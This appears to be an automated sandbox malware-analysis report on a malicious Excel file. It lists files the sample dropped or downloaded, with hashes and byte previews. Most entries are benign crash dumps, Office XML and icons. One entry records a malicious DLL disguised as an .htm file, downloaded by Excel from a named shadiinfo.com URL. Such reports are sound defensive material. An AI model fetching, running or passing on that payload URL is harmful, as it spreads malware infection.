Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.7.9.0.8.2.4.3.2.6.4.8.4.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.a.a.6.9.2.0.-.9.8.2.2.-.4.c.a.c.-.9.f.8.0.-.2.0.e.f.e.8.d.c.8.b.5.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.5.9.1.a.3.d.c.-.5.5.2.3.-.4.2.f.3.-.a.f.8.3.-.a.7.6.1.b.2.8.4.e.a.9.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.f.0.-.0.0.0.0.-.0.0.1.7.-.a.2.8.b.-.e.7.2.7.e.c.5.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER347D.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Jun 11 18:04:03 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	33660
Entropy (8bit):	2.6336326099285547
Encrypted:	false
SSDEEP:	192:anXMFMT+h1NeHzPCphDCJ7TSkKMpAWmc8XYgkW1PXRvOuC7fn8N:gKMe1kHzPue5pKlmW1PB2Zrg
MD5:	955762FC852FDAF02B8660A1114FBDEB
SHA1:	CE7F1BB2D11B2E6AF17BD792E53FD4E095335D31
SHA-256:	B245B474807526B0C8C26ABE551522AA6A4315533A5109CF198F7C2EE94B6322
SHA-512:	DEFF15F83828080E390D5E3016A7DD6C0F72E4C048C826A024A090D87F0FA4E63A2138D5305FD62D13E67E1AFB96559D2D88396D018889D8F89A1B89D34B0402
Malicious:	false
Preview:	MDMP....... ..........`...................U...........B..............GenuineIntelW...........T..............`.............................@..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER379B.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8250
Entropy (8bit):	3.6889691867893912
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi/nq6IFp6YLASUSgmfJaSsCpBB89b0KsfY8m:RrlsNii6IFp6YcSUSgmfJaSY0pfi
MD5:	907479A12E4D85DDF14F9F9142776FA3
SHA1:	DECFEB3FBE7BD6BA1BC3D322C8439BCAD9537F8D
SHA-256:	649A8FF2209CFE63A50F05918B2AB89B12E69334C20D5973B875EABEB448AE37
SHA-512:	DCD97D968C3B16A4ABB05606A58E110794A1374E2FE10EB0E5E37F04F09F540AC1911D3E45025C203A5A443CA707EEB14CCB139A1054BAD3DE988CBAB75D2C8E
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.0.5.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3867.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4620
Entropy (8bit):	4.444867049906616
Encrypted:	false
SSDEEP:	48:cvIwSD8zsmJgtWI9SEWSC8BC8fm8M4Jkzcr6Fx+q8h4yi0KJYEgd:uITf8NdSNNJqcryM4t0qYEgd
MD5:	F27F8B090714B7B211ABA1EF238685D8
SHA1:	31CC278A8EAF86F82A94992698E3B524A8A43EF0
SHA-256:	0591B5C913CE127A624F2C40D3C8E4A50494094EB5D819EB6CBA109931DBE4C4
SHA-512:	0ABF12FBFD1FB5E6BC5DFE2414197985BC07B7CC2B2A95B9DB4764D134088BC50AAD056CD40033A82EC2B70ACD7C518C825A1B19D4CF52462DACBD2C249463AB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1029794" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB947.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Jun 11 18:02:27 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	34556
Entropy (8bit):	2.5685832502010193
Encrypted:	false
SSDEEP:	192:lGa80PVDBsRUUyBHLF5KWmc8XYgkW1BE6UgYQ9nLv:khylsibBH4lmW1G6UI9Lv
MD5:	1BFD5C31626B609C283125C41A53F3AB
SHA1:	45A7F6B3E4D0232AA791A3541C439DFC36E5ED4D
SHA-256:	28E1EAAEDCA87B8E00D00D05FC41EB716B660E5915A96960FCBC244D1C4F5903
SHA-512:	624C1850D8C842D82F960B2D8B0E1E153D86B223475AB0F1D6D2F478E153F47D3450EFE48C965C1583E6A7D038760E0B381E94E502E267C01C3A2E39B01829BA
Malicious:	false
Preview:	MDMP....... .......3..`...................U...........B..............GenuineIntelW...........T....... ...-..`.............................@..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD30.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8254
Entropy (8bit):	3.6892490263246747
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNihx6IFmQe6YyhSU6gmfJaSsCpBB89bLY+sf0MZm:RrlsNiX6IFQ6YsSU6gmfJaSYLY9fC
MD5:	07583ADDD0C2F909CBC7FECF0CB17620
SHA1:	C23F230B8FBDE7525E266A8C7AE32F200201232B
SHA-256:	455BDB45B4A12C3C758DB74834C6C08237371BE24F5E0F3B4A39768A6E406AB4
SHA-512:	75DBCA736C4CA950698683920303E2D9FDF9DE36607219FD4D71A6840F409B70B656E77EEE6FC9208AEB6B7BF36C58222300D50DB7B1B26910BBAC4DB00F953A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.3.6.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE5A.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4620
Entropy (8bit):	4.443734064950812
Encrypted:	false
SSDEEP:	48:cvIwSD8zsvJgtWI9SEWSC8BB8fm8M4Jkzcr6F5X+q8h4yiKgnKJYlgd:uITfRNdSNIJqcrOXM4tKaqYlgd
MD5:	14A38E4CC5D1D757C0A80A8958FC13C0
SHA1:	62478B617917D282CE95395C03CE021EFD30201B
SHA-256:	EE3223F461B1FD62C34D95D1DAA5F0C42D2A059352DB7BFBAD2A58364478D63D
SHA-512:	752B2761A95882FD456AADF2C917D4DB42A422D7093FA6F7B4C51251477EB761116326EA271A3A2003FD0EF469C40ADC6119B79F2A8F98343A91D0913E4DC3D6
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1029793" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\2931D31E-E476-4A7B-8B64-97D46D540C47 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	134922
Entropy (8bit):	5.369100325878226
Encrypted:	false
SSDEEP:	1536:ucQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:+EQ9DQW+ziXOe
MD5:	7F817E75477C6B048DEA22A5933A521B
SHA1:	21E70CA5F7BB6719B8EF1D109D4CBF3DAF609A55
SHA-256:	A4CD53C0081A51A42DA8164EEE93A9B48D58FC9D31ADF99077E67B8123A58528
SHA-512:	4D37F8AFCD2979F53E383739552E56533C9E72807585B41C1ED39D65E1B8D8BAA78ED98295422CD1A185A680F6D2C5D69B241B773279B68C57F20EF023EBDBD7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-11T09:02:03">.. Build: 16.0.14209.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\352E3996.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 934 x 29, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	42557
Entropy (8bit):	7.992800895943226
Encrypted:	true
SSDEEP:	768:Pfsq4UmepRdblCFcXhw9KnRTRews6xD0FvBlwAS1A8x7BcS0OvD230:PR3ZblCF28KRsws6CFv0AYx7Bl3b230
MD5:	B1F262A694930ADB699FA94E3394887F
SHA1:	9C9B66D3A3F09AECA45DB94304CDD6FB3C5BD4C9
SHA-256:	9C99EC61392B9022A38C1354124360147E8185065095BD2EC92B1416CF9F4B68
SHA-512:	1CA7E6750178B88EC3AA7A0B83348EA389E26C27E0D7E919D807BE470714E5B4F04ACEB69D391F0498D4E465E6620E9449CA2F40755B5CE8196E683502EBF5F4
Malicious:	false
Preview:	.PNG........IHDR.............6......sRGB.........pHYs..........+......IDATx^....dU....S.:ON.0.0....s0 .....$..%#HR.T.......$..0C...Su...[.TM..{.......C.S}..^{......].^..ZX.Wb.W....X!..A.P....0..u...X.V.3.....z..tiO{GW..?...A.......ca2Y.... ...cAX..zZ..2M.$..g.O.e..r?z&.....................=..Z.A........a.Z..ka<..N.R.c......./.[..j.^...Nk.(..y.,..z"...R..Z+..D1Q....z....0..u~..jU_.b.Z.V....:..5:.(.......-...A2.O.{..p.j..].<........0..0..+...E...^...z....#..j.d...X._..1..M.5..O.^.."..l....G....U1........X.6.Z.\.&..h..m..T..xH.j..3<$.H...a..n....}t.A.jT.6G.h@..<.x..x...cb......C..{.D.'QW<.o~..?.....4F_..B..h.\...y8..)....j.Z.d..#P..P..O.....(.0...f....B_z>.E .w../..(...'.Fw..yT..G..)...b9..g.AA`.a..v.zfY.F........._r.i.d.`....Q.g.m"..\..&.t.X.q1}.$.S....2..~...d."..1.. (.0.F....t...i..@f.. ...(..8..q.....I.....ad.....z%....;...y.O...X<Q..X.....B..H........<)....4.&9.4......1.h..#B.....g.....bO.59.A..M.....J..vX35..X....(G.A.u...8.. .{

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\437B2448.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	848
Entropy (8bit):	7.595467031611744
Encrypted:	false
SSDEEP:	24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
MD5:	02DB1068B56D3FD907241C2F3240F849
SHA1:	58EC338C879DDBDF02265CBEFA9A2FB08C569D20
SHA-256:	D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
SHA-512:	9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
Malicious:	false
Preview:	.PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm\|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY.^......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6E6E46AA.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 521 x 246, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	32996
Entropy (8bit):	7.975478139053759
Encrypted:	false
SSDEEP:	768:N4k48AnTViUidx37OODgvnrxtxAudMN1VTRVHdB4K7K:NE8m+L37OOwrCXN1VTR1PK
MD5:	4E69B72B0CE87CC7EE30AA1A062147FE
SHA1:	09B0AA5414E08756E0AE53E1BE5C70DB4DEAF2E8
SHA-256:	77A1F749389CBF771D5197FF0FF17113FCA1D91989ADCADF2852876A6CC14988
SHA-512:	6246AF2137E773F7719033AFE75F0B00FF3A4B5543DBA53737FC8D33EE42478E3D8A5CF166E9EFD2F54A2F3E0D62417BDDC1CB824642305B59AB1229313D2D79
Malicious:	false
Preview:	.PNG........IHDR..............[.J....sRGB.........pHYs..........+......IDATx^.].`......{%.$..A...R.P@z....O...S.<;.VT.REA.(...I...{.......m...]..r./.......~.\|]h.Z....P.(........E."@...P.(.v.P.@..E."@....#@y.......E."@y.......E."...*78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x...7x...S.(...g.P...!.=E."@..<.(o.5.3..P.(.......B.{..E.".y.P..ykNgL...P..!@y.3.......E........."@...8C...g...)......!@y..9.1E."@.p........S.(....C....[s:c..E."......!D...P.(.........t.....E....78C.~O...P.<....<o..).....3.(op...."@...x..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\725B52A3.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	557
Entropy (8bit):	7.343009301479381
Encrypted:	false
SSDEEP:	12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
MD5:	A516B6CB784827C6BDE58BC9D341C1BD
SHA1:	9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
SHA-256:	EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
SHA-512:	C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
Malicious:	false
Preview:	.PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0\|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.\|.-P#P;..p._.......jUG....X........IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8BD87A9.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 246 x 108, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	10270
Entropy (8bit):	7.975714699744477
Encrypted:	false
SSDEEP:	192:3sXvKLMbye/PEXiKTUgCto9h4F6NwfU6vGDpdYNbcQZgkbd4cgc:3iLh/gJ59CDfU6LocbGK
MD5:	9C4F09E387EA7B36C8149EA7C5F8876E
SHA1:	FF83384288EB89964C3872367E43F25FAFF007CC
SHA-256:	A51C1D65092272DAEB2541D64A10539F0D04BC2F51B281C7A3296500CFCA56DE
SHA-512:	0FDDE22CFDDE8BB1C04842D2810D0FD6D42192594E0D6120DE401B08B7E2CFFB5333792BC748E93CD70FA14734CC7D950620CB977DDBBDB52D92BDA8F35521F8
Malicious:	false
Preview:	.PNG........IHDR.......l...........sRGB.........pHYs..........+....'.IDATx^.].\|.U...%...J.".....H.&Ui......E.........D.7....U.i..FH#=......3..$K....'{3....7........0.H......H..03..,....8.q........'@\...S@.../.0=....\|....}\|......0.... ...,LO........q._`az.....8......... .`..) @...X...q..>N...>.........q........'@\...S@.../.0=....\|....}\|......0.... ...,LO........q._`az.....8...l..m.i'Sj.W.i.S.TJ....D.D._%...]..i.;J..b..T.).Ik.L6..L.mN....!..\..'{$.o._b..h....t"@.?...y...d..h..\|..B9D..CJD..t."........bR"....I)H....z.......>\|.....E.x..r....J.U..[...p:D....XF......A...E.....b..C...C..C......=.Z..$.=../....Y..x5CY.0l..,~.W. .?......;...$.'....<.H.2...z..6(.E........kw8w^.\~...".C,gl&.m..J2.).HI.....b.r...'.....r.H...P.....'...A.^.q..j).cZ.^1~.\|.........dv^.^v..X..v..6/^.$rR. iK..H.Uu.Pvk....U.....'.Fd..Z.]mu\1.Zb.\b...N..P..&tr;.W....J.K(@.^A..R.S.[~.v.R.YO...0-...2..h."..............7..Ng...R...e.&..@..t..N...{5...W.x./#.%..}t...F8-..M1..(4b1....&.....)B...6.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BDF0B09F.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 490 x 30, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	18547
Entropy (8bit):	7.9850486438978985
Encrypted:	false
SSDEEP:	384:kBCIQCloAwCZDy0xOTn6/g6l4NpWfw9nHk6Ka01f7Y/H:kBCIQpAwODPMT6/gfOUKN70
MD5:	ED31C7053D581EDC4C98D222CE02EDEF
SHA1:	6BA7A49CC6FF8FE00E9C5BC75F48AB7E679536DD
SHA-256:	0FCF61397154DF01CFAECA362BD643D88AAD5FEDD07B52DC8A921CC0D7236534
SHA-512:	929BF13F2A050B33D0EABDAC97CAAFDDE612AD521027FEE4DD51E28A3CF61198D6C045E00AB85223C73D74D18BB4EAA1681C7AFA917946DC08A3C75FB2AB4935
Malicious:	false
Preview:	.PNG........IHDR.............l{......sRGB.........pHYs..........+....H.IDATx^...U............"x....U...."...Tc.{...M1M..In....TATb4F,`oD..Q..3......g.3..Lr.D....a8....~.z....Z...yyF..9...:.H.Q2..)/L.....Q.}....(J..,...w2>R.$..G2..m>..\|...0.M.g.Xnjj...P.v..x....S......B..p.=.Lz.^..Wi..2U.V'.a..DE.'..rT.z....#.;..]....[?.C...o.m`]..m][;.:<..]F.9..u..Q]c.Ue.9....(.F.Z.~s..Q:..B...)..LZ.TTo..P.gc.l.'.X.}..H....Q.h\|....L..rcd.2dN..co..5.....w.U.4..}........{.Q.....D2.J.z~..:Y3,.H..(#.J.Q......N.._7....w.....].2w.6...._....u.......9-.7.f9...E9...p.A..f....=....Bqu....A.u.JG>b"...%..0..W.H=...G#.DR.....P.\|FD).NJ....)>.;...M...T.dW..t:[.xT..M.\|S...O..."M.4u7.uS...]4..R.vK....).ZK.. J.=.9C.].kr..ES..6..f.(.....N':..t..^.S....kn[s.#..(.....m.....~....6>....:u.J.mO.....%D...Q...6%....!......H.....v..^%....$.._..V........[o5.H8......n.~M.z.RL.0p:.iC.k.1..$...............3[....mS5..........E...2.&...k]...A.....K.8...5..O.@7.[-.F47...i....in...y....A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pt[1].htm Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	504158
Entropy (8bit):	5.8468417771868095
Encrypted:	false
SSDEEP:	6144:l5NoCFH7OEn1J8JRO+njE2X2J/7vKsakTixuu8njF/EeBP:XKCFHyu1+lFGwuu8njF/Eq
MD5:	DBF8EA4418AFB979A09B782CFBDACCBB
SHA1:	03AA8B79FE5289A65C7327524DD052D1134BF537
SHA-256:	E0934288689E1796773B1EEFFE0098C40962335D883A4B4DBAD87E68D975F548
SHA-512:	128D0CEC8AAA9DFEDBA6E98D50747F5200FE7B68F82C7F969A89537D7F5E9EBAB47DF8B38F1F6ECDC1BBFA56C2D4614E4286454A2BF72F9AA8EB6E65ED1E771B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
IE Cache URL:	https://shadiinfo.com/2DP6mQeg/pt.html
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................PE..L...<..`...........!.........^.......G.......................................`..............................................D...d........K..............................................................................D............................code...t........................... ..`.rdataf.............................@....rsrc....K.......L..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2BA10000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	159443
Entropy (8bit):	7.962652199904702
Encrypted:	false
SSDEEP:	3072:y89VlUBWA6CFvA7brCxAVIKuSkmxVymd1xXP8lTkdm3bGeAxiLpz:y83liWA6FiYpxVyWxf8lTkeGKB
MD5:	3010C19E58529503ED930FA234B68245
SHA1:	3E97B108C8192D0A8EE815A79D70D6CDC2F41D7E
SHA-256:	DC74114DFB71D68F1D6026BF3614D566A46F46A92FE09762EA1941313818D3FD
